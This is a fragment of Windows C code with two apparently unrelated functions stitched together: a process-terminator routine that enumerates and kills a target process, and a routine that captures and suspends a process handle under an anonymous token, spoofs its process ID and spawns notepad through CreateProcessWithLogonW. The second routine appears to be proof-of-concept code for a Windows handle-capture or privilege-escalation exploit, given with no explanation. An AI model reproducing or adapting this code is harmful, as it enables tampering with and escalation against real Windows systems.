static NTSTATUS NTAPI TerminatorTP1a(
_In_ HANDLE ProcessId
)
{
NTSTATUS status;
HANDLE processHandle = NtCurrentProcess();
ULONG i;
if (!NtGetNextProcess)
return STATUS_NOT_SUPPORTED;
if (!NT_SUCCESS(status = NtGetNextProcess(
NtCurrentProcess(),
ProcessQueryAccess | PROCESS_TERMINATE,
0,
0,
&processHandle
)))
return status;
for (i = 0; i < 1000; i++) // make sure we don't go into an infinite loop or something
{
HANDLE newProcessHandle;
PROCESS_BASIC_INFORMATION basicInfo;
if (NT_SUCCESS(PhGetProcessBasicInformation(processHandle, &basicInfo)))
{
if (basicInfo.UniqueProcessId == ProcessId)
{
PhTerminateProcess(processHandle, STATUS_SUCCESS);
break;
}
}
if (NT_SUCCESS(status = NtGetNextProcess(
processHandle,
ProcessQueryAccess | PROCESS_TERMINATE,
0,
0,
&newProcessHandle
)))
{
NtClose(processHandle);
processHandle = newProcessHandle;
}
else
{
NtClose(processHandle);
break;
}
}
return status;
}
DWORD CALLBACK CaptureAndSuspendProcess(LPVOID)
{
ImpersonateAnonymousToken(GetCurrentThread());
while (NtGetNextProcess(nullptr, MAXIMUM_ALLOWED, 0, 0, &g_hProcess) != 0)
{
}
NTSTATUS status = NtSuspendProcess(g_hProcess);
printf("Suspended process: %08X %p %d\n", status, g_hProcess, GetProcessId(g_hProcess));
RevertToSelf();
SetProcessId(GetProcessId(g_hProcess));
WCHAR cmdline[] = L"notepad.exe";
STARTUPINFO startInfo = {};
PROCESS_INFORMATION procInfo = {};
startInfo.cb = sizeof(startInfo);
if (CreateProcessWithLogonW(L"user", L"domain", L"password", LOGON_NETCREDENTIALS_ONLY,
nullptr, cmdline, CREATE_SUSPENDED, nullptr, nullptr, &startInfo, &procInfo))
{
printf("Created process %d\n", procInfo.dwProcessId);
}
else
{
printf("Create error: %d\n", GetLastError());
}
TerminateProcess(g_hProcess, 0);
ExitProcess(0);
return 0;
}
